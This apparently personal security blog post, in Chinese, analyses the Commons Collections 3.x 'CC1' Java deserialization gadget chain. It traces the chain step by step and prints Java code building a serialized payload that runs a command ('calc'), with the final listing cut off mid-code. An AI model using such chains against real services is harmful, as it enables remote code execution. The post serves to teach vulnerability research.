<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>
    ebandeng-CC1反序列化链分析
  </title>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ebandeng" type="application/atom+xml">
</head>

  
    <link rel="stylesheet" href="/css/lengux.css">
    
      

        <body>
          <div class="container headertop">
  <div class="menu-top">
     <div class="timer"></div>
 
  </div>
 

  <div class="menu-list">
    
      <a href="/">
        home
      </a>
      
      <a href="/about">
        about
      </a>
      
      <a href="/archives">
        archives
      </a>
      
      <a href="/link">
        link
      </a>
      
        
          <span class="darkmodes" ><svg   xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-moon-stars-fill" viewBox="0 0 16 16">
  <path d="M6 .278a.768.768 0 0 1 .08.858 7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71 0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
  <path d="M10.794 3.148a.217.217 0 0 1 .412 0l.387 1.162c.173.518.579.924 1.097 1.097l1.162.387a.217.217 0 0 1 0 .412l-1.162.387a1.734 1.734 0 0 0-1.097 1.097l-.387 1.162a.217.217 0 0 1-.412 0l-.387-1.162A1.734 1.734 0 0 0 9.31 6.593l-1.162-.387a.217.217 0 0 1 0-.412l1.162-.387a1.734 1.734 0 0 0 1.097-1.097l.387-1.162zM13.863.099a.145.145 0 0 1 .274 0l.258.774c.115.346.386.617.732.732l.774.258a.145.145 0 0 1 0 .274l-.774.258a1.156 1.156 0 0 0-.732.732l-.258.774a.145.145 0 0 1-.274 0l-.258-.774a1.156 1.156 0 0 0-.732-.732l-.774-.258a.145.145 0 0 1 0-.274l.774-.258c.346-.115.617-.386.732-.732L13.863.1z"/>
</svg></span>
            
  </div>

</div>
            <div class="header-top">
  <!-- <div class="header-flex"><a href="/">
      <img class="icon" src= alt="">
    </a>
  </div> -->
  <div class="menu-list">
    
      <a href="/">
        home
      </a>
      
      <a href="/about">
        about
      </a>
      
      <a href="/archives">
        archives
      </a>
      
      <a href="/link">
        link
      </a>
      
        
          <span class="darkmodes" ><svg   xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-moon-stars-fill" viewBox="0 0 16 16">
  <path d="M6 .278a.768.768 0 0 1 .08.858 7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71 0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
  <path d="M10.794 3.148a.217.217 0 0 1 .412 0l.387 1.162c.173.518.579.924 1.097 1.097l1.162.387a.217.217 0 0 1 0 .412l-1.162.387a1.734 1.734 0 0 0-1.097 1.097l-.387 1.162a.217.217 0 0 1-.412 0l-.387-1.162A1.734 1.734 0 0 0 9.31 6.593l-1.162-.387a.217.217 0 0 1 0-.412l1.162-.387a1.734 1.734 0 0 0 1.097-1.097l.387-1.162zM13.863.099a.145.145 0 0 1 .274 0l.258.774c.115.346.386.617.732.732l.774.258a.145.145 0 0 1 0 .274l-.774.258a1.156 1.156 0 0 0-.732.732l-.258.774a.145.145 0 0 1-.274 0l-.258-.774a1.156 1.156 0 0 0-.732-.732l-.774-.258a.145.145 0 0 1 0-.274l.774-.258c.346-.115.617-.386.732-.732L13.863.1z"/>
</svg></span>
            
  </div>

  <svg class="list" id="list" xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="currentColor"
    class="bi bi-list" viewBox="0 0 16 16">
    <path fill-rule="evenodd"
      d="M2.5 12a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5zm0-4a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5zm0-4a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5z" />
  </svg>
</div>
              <div class="p-4 p-md-5 mb-4 rounded bgimg"
    style="height: 100vh;display: flex;justify-content: center;align-items: center;">
    <div class="px-4 py-5 my-5 text-center" style="overflow: hidden;">
        <!-- <img class="d-block mx-auto mb-4" src= alt="" style="width: 200px;height: 200px;"> -->
        <div class="display-5 fw-bold">
            <div class="wrapper">
                <div class="typing-demo">
                    This is a ebandeng blog.
                </div>
            </div>
        </div>

        <div class="col-lg-6 mx-auto">
            <p class="lead mb-4">
                地下室里有一罐泡在福尔马林里的老鼠，我嘲笑他被液体困在方寸之地，它告诉我他泡在福尔马林里防止肉体腐烂它和泡在酒精里期望保持鲜活思想大脑的我一样可笑，只是被一堆无聊的液体拘于一角之隅的标本。
            </p>
            <div class="d-grid gap-2 d-sm-flex justify-content-sm-center" id="linkshear">
                <a href=https://github.com/XUSHAO11/Lengux>
                    <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" fill="currentColor"
                        class="bi bi-github darksvg" viewBox="0 0 16 16">
                        <path
                            d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.012 8.012 0 0 0 16 8c0-4.42-3.58-8-8-8z" />
                    </svg>
                </a>
                <a href=https://tweetdeck.twitter.com/login>
                    <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" fill="currentColor"
                        class="bi bi-twitter darksvg" viewBox="0 0 16 16">
                        <path
                            d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z" />
                    </svg>
                </a>
                <a href=/>
                    <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" fill="currentColor"
                        class="bi bi-display darksvg" viewBox="0 0 16 16">
                        <path
                            d="M0 4s0-2 2-2h12s2 0 2 2v6s0 2-2 2h-4c0 .667.083 1.167.25 1.5H11a.5.5 0 0 1 0 1H5a.5.5 0 0 1 0-1h.75c.167-.333.25-.833.25-1.5H2s-2 0-2-2V4zm1.398-.855a.758.758 0 0 0-.254.302A1.46 1.46 0 0 0 1 4.01V10c0 .325.078.502.145.602.07.105.17.188.302.254a1.464 1.464 0 0 0 .538.143L2.01 11H14c.325 0 .502-.078.602-.145a.758.758 0 0 0 .254-.302 1.464 1.464 0 0 0 .143-.538L15 9.99V4c0-.325-.078-.502-.145-.602a.757.757 0 0 0-.302-.254A1.46 1.46 0 0 0 13.99 3H2c-.325 0-.502.078-.602.145z" />
                    </svg>
                </a>

            </div>
        </div>
    </div>
    <svg id="updown" class="darksvg" xmlns="http://www.w3.org/2000/svg" width="40" height="40" fill="currentColor"
        class="bi bi-chevron-compact-down" viewBox="0 0 16 16">
        <path fill-rule="evenodd"
            d="M1.553 6.776a.5.5 0 0 1 .67-.223L8 9.44l5.776-2.888a.5.5 0 1 1 .448.894l-6 3a.5.5 0 0 1-.448 0l-6-3a.5.5 0 0 1-.223-.67z" />
    </svg>
</div>
                <div id="content-outer">
                  <div id="content-inner">
                    <main class="container">
                      <div class="row g-5">
                        <div class="col-md-8">
                          
<article id="post">
    <h1>CC1反序列化链分析
    </h1>
    <h2 id="Commons-Collections简介"><a href="#Commons-Collections简介" class="headerlink" title="Commons Collections简介"></a><strong>Commons Collections简介</strong></h2><p>Commons Collections是Apache软件基金会的一个开源项目，它提供了一组可复用的数据结构和算法的实现，旨在扩展和增强Java集合框架，以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现，以及许多实用程序类和算法实现。它的代码质量较高，被广泛应用于Java应用程序开发中。本篇文章就是分析Commons Collections3.1版本下的反序列化问题，针对于它的攻击链也被称为cc1链。</p>
<h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a><strong>准备工作</strong></h2><p>选择jdk版本为8u65，因为漏洞在8u71的版本就被修复了。下载地址：<a target="_blank" rel="noopener" href="https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html%E3%80%82">https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html</a></p>
<p>CommonsCollections的版本选择3.2.1，不能太高，太高也是没有漏洞的。添加Maven依赖下载：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependencies</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- https://mvnrepository.com/artifact/commons-collections/commons-collections --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">version</span>&gt;</span>3.2.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependencies</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>另外，为了方便调试我们还需要java源码，因为源码中大多都是class文件，不方便阅读和查找。所以需要下载openjdk对应的源码，链接：<a target="_blank" rel="noopener" href="https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/af660750b2f4%EF%BC%8C%E7%82%B9%E5%87%BBzip%E4%B8%8B%E8%BD%BD%EF%BC%8C%E8%A7%A3%E5%8E%8B%E6%88%90%E6%96%87%E4%BB%B6%E5%A4%B9%E3%80%82">https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/af660750b2f4 </a> </p>
<p>点击zip下载， 把下载的openjdk里 &#x2F;share&#x2F;classes&#x2F; 里面的 sun包 复制到 jdk1.8.0_65里</p>
<p>在IDEA中，选择项目结构， 将jdk中的src文件路径添加到源路径中</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892166073-1.png" alt="Image"></p>
<p>配置Maven源，要不然没办法下载源码</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892181348-3.png" alt="Image"></p>
<h2 id="cc1链分析"><a href="#cc1链分析" class="headerlink" title="cc1链分析"></a><strong>cc1链分析</strong></h2><h3 id="利用点"><a href="#利用点" class="headerlink" title="利用点"></a><strong>利用点</strong></h3><p>此链的漏洞利用点在Commons Collections库中的Transformer接口</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892196182-5.png" alt="Image"></p>
<p>再寻找继承于Transformer接口的类，快捷键alt+crtl+b快速查找。有很多都继承了这个接口，我们定位到InvokerTransformer类中，此类可以被序列化，找到重写的Transform方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716892209620-7.png" alt="Image"></p>
<p>这里通过反射调用任意类的任意方法。其中的参数都是通过该类的构造函数控制，也是我们所能控制的。所以这里应该是可以执行任意方法的。</p>
<p>所以我们可以尝试测试一下能执行恶意类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1</span> &#123;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> &#123;</span><br><span class="line">		<span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">		<span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line">		invokerTransformer.transform(runtime);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>实例化invokerTransformer类，传入方法名，参数类型，参数值。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897875614-9.png" alt="Image"></p>
<p>运行一下代码，成功弹出计算器。 漏洞利用点有了，接下来就是逆推构造调用链，最终定位到某个类的readObject方法里。</p>
<h3 id="调用链"><a href="#调用链" class="headerlink" title="调用链"></a><strong>调用链</strong></h3><p>我们是在transform方法里执行命令的，所以接下来找哪个类调用了transform方法。右键点击查找用法可快速查找什么类调用了transform方法。共有二十四处调用，这些调用的地方我们都可以看看，最后找到TransformedMap类的checkSetValue方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897911104-11.png" alt="Image"></p>
<p>valueTransformer是通过TransformerMap赋值的， 但是函数类型为protected，只能本类调用。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897926046-13.png" alt="Image"></p>
<p>在该类中还一个decorate方法， 类似于装饰器。它实例化了本类，能够调用TransformedMap构造器并为valueTransformer赋值。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897944630-15.png" alt="Image"></p>
<p>那么回到checkSetValue方法，我们已经可以控制valueTransformer，那么接下来找哪个类的哪个方法调用了该方法。只有一处调用，MapEntry类的setValue方法。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897970806-17.png" alt="Image"></p>
<p>我们知道Entry代表map中的一个键值对，MapEntry类重写了Map的setValue方法</p>
<p>我们先通过对Map的遍历触发setValue方法，主要思路：实例化一个Map，put一个键值对，然后通过TransformedMap的decorate方法进行封装，最后进行遍历</p>
<p>这里的链子就是 Map-&gt;setValue-&gt;checkSetValue-&gt;transformer，通过TransformedMap的decorate方法进行传参。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716897988890-19.png" alt="Image"></p>
<p>调试一下</p>
<p>在decorate方法下断点调试一下， 此时，valueTransformer参数赋值为InvokerTransformer对象，步入</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898008355-21.png" alt="Image"></p>
<p>此时，valueTransformer参数赋值为InvokerTransformer对象，步入</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898025367-23.png" alt="Image"></p>
<p>接着调用构造器，把InvokerTransformer对象赋值给valueTransformer，走到遍历键值对的时候，调用setValue方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898049464-25.png" alt="Image"></p>
<p>此时就调用了TransformedMap的checkSetValue方法。value的值为Runtime对象。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898065110-27.png" alt="Image"></p>
<p>步入，最后就调用了InvokerTransformer的transform方法。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898081876-29.png" alt="Image"></p>
<p>最终执行命令，弹出计算器。那么就说明此链是走的通的，还是逆向查找，看看哪个类的哪个函数调用了setValue方法，如果是readObject类调用了那就可以进行序列化了。</p>
<h3 id="入口类"><a href="#入口类" class="headerlink" title="入口类"></a><strong>入口类</strong></h3><p>查找用法，在AnnotationInvocationHandler类的readObject方法调用了setValue方法。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898101067-31.png" alt="Image"></p>
<p>虽然找到入口点了，但是还要有一些问题需要解决</p>
<h4 id="Runtime类不能被反序列化"><a href="#Runtime类不能被反序列化" class="headerlink" title="Runtime类不能被反序列化"></a><strong>Runtime类不能被反序列化</strong></h4><p>可以通过反射获取到它的class对象，class对象是可以被反序列化的，跟进看一下：</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898117985-33.png" alt="Image"></p>
<p>一般的反射执行命令的写法为：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1test1</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> NoSuchMethodException, InvocationTargetException, IllegalAccessException, IOException &#123;</span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line">        <span class="type">Method</span> <span class="variable">runtime</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;getRuntime&quot;</span>);</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">a</span> <span class="operator">=</span> (Runtime) runtime.invoke(<span class="literal">null</span>,<span class="literal">null</span>);<span class="comment">//获得Runtime实例</span></span><br><span class="line">        <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> c.getMethod(<span class="string">&quot;exec&quot;</span>,String.class);<span class="comment">//获得exec函数</span></span><br><span class="line">        method.invoke(a,<span class="string">&quot;calc&quot;</span>);<span class="comment">//调用Runtime对象的exec函数弹出计算器</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们要把这个写法嵌套在 InvokerTransformer类里面</p>
<p>首先获得runtime方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Method</span> <span class="variable">getMethod</span> <span class="operator">=</span> (Method) <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;).transform(Runtime.class);</span><br></pre></td></tr></table></figure>

<p>为什么要这样写我们可以跟进一下InvokerTransformer方法和getMethod方法</p>
<p>InvokerTransformer需要传递三个参数，一个是参数名称，一个是Class数组，一个是Object数组。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898163064-35.png" alt="Image"></p>
<p>getMethod方法需要传递两个参数，一个是参数明，还有一个是Class数组</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898177614-37.png" alt="Image"></p>
<p>获取Runtime实例</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Runtime</span> <span class="variable">runtime</span> <span class="operator">=</span> (Runtime) <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;).transform(getMethod);</span><br></pre></td></tr></table></figure>

<p>获取exec函数调用runtime示例执行calc。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>,<span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;).transform(runtime);</span><br></pre></td></tr></table></figure>

<p>这样就把命令执行嵌入 InvokerTransformer方法里了。成功执行</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898206065-39.png" alt="Image"></p>
<p>但是这样每次就需要调用一次transform方法，传入上一步的输出。很麻烦</p>
<p>在Commons Collections库中存在ChainedTransformer这么一个类，可以将多个Transformer串联在一起形成一个链，递归调用。跟进这个类看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898221509-41.png" alt="Image"></p>
<p>它的构造方法传递一个数组，它的transform方法将iTransformers进行递归调用。代码如下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898235928-43.png" alt="Image"></p>
<p>完美解决不能反序列化的问题。</p>
<h4 id="AnnotationInvocationHandler不能在包外实例化"><a href="#AnnotationInvocationHandler不能在包外实例化" class="headerlink" title="AnnotationInvocationHandler不能在包外实例化"></a><strong>AnnotationInvocationHandler不能在包外实例化</strong></h4><p>看代码</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898252508-45.png" alt="Image"></p>
<p>构造器没写类型，那就是默认访问修饰符，只能在包内实例化。所以还是需要反射来获得实例对象。</p>
<p>该构造器接收两个参数，分别是注解类型的Class对象和Map对象。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898268417-47.png" alt="Image"></p>
<p>不能直接实例化，我们就需要用反射去调用他</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898282217-49.png" alt="Image"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">AnnotationInvocationHandler</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);<span class="comment">//获取类名</span></span><br><span class="line"><span class="type">Constructor</span> <span class="variable">AnnotationInvocationHandlerConstructor</span> <span class="operator">=</span> AnnotationInvocationHandler.getDeclaredConstructor(Class.class, Map.class);<span class="comment">//获取构造器</span></span><br><span class="line">AnnotationInvocationHandlerConstructor.setAccessible(<span class="literal">true</span>);<span class="comment">//设置可以访问</span></span><br><span class="line"><span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> AnnotationInvocationHandlerConstructor.newInstance(Override.class, TransformedMapDecorate);<span class="comment">//实例化</span></span><br><span class="line"><span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).writeObject(o);</span><br><span class="line"><span class="type">Object</span> <span class="variable">o1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;cc1.bin&quot;</span>)).readObject();</span><br></pre></td></tr></table></figure>

<h4 id="满足readObject的两个if判断"><a href="#满足readObject的两个if判断" class="headerlink" title="满足readObject的两个if判断"></a><strong>满足readObject的两个if判断</strong></h4><p>实际上这条链根本就没有调用setValue方法，打断点调试看看。断点直接打在readObject方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898310908-51.png" alt="Image"></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898318824-53.png" alt="Image"></p>
<p>第一个if就进不去，这个memberType实际上就是获取注解对象名为name的值，这个name，就是memberValues的键名。而这个memberValues是什么呢？我们创建的Map对象的键值，我们设置的Override，跟进看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898337387-55.png" alt="Image"></p>
<p>是没有值的，所以需要换一个注解，跟进Target看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898352442-57.png" alt="Image"></p>
<p>是有value值。同时对于Map对象，需要put键值对，键名必须为value，键值随意。更改完成后，再跟进看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898384711-61.png" alt="Image"></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898367694-59.png" alt="Image"></p>
<p>这是var7有值的。</p>
<p>继续跟进</p>
<h4 id="setValue方法的参数不可控"><a href="#setValue方法的参数不可控" class="headerlink" title="setValue方法的参数不可控"></a><strong>setValue方法的参数不可控</strong></h4><p>实际上执行了setValue方法后会跟进到checkSetValue。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898434142-63.png" alt="Image"></p>
<p>而这里的value不是我们想要的Runtime.class，也就是不可控。可以利用一个类ConstantTransformer，跟进看一下它的transform方法</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898446812-65.png" alt="Image"></p>
<p>无论接收什么参数，返回一个固定值，而这个固定值可以通过构造器可控。也就是说，无论value被赋上什么值，只要它调用了ConstantTransformer的transform方法，结果我们都可控。在Transformer数组里实例化ConstantTransformer</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898461498-67.png" alt="Image"></p>
<p>然后调试看一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898475784-69.png" alt="Image"></p>
<p>在数组遍历时会调用transform将输入改变为Runtime对象。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1716898490502-71.png" alt="Image"></p>
<p>完整代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Target;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationTargetException;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">CC1</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException &#123;</span><br><span class="line">        <span class="comment">//定义一个数组</span></span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),<span class="comment">//</span></span><br><span class="line">                <span class="comment">//获取getRuntime方法</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="comment">//调用invoke方法获得实例</span></span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span 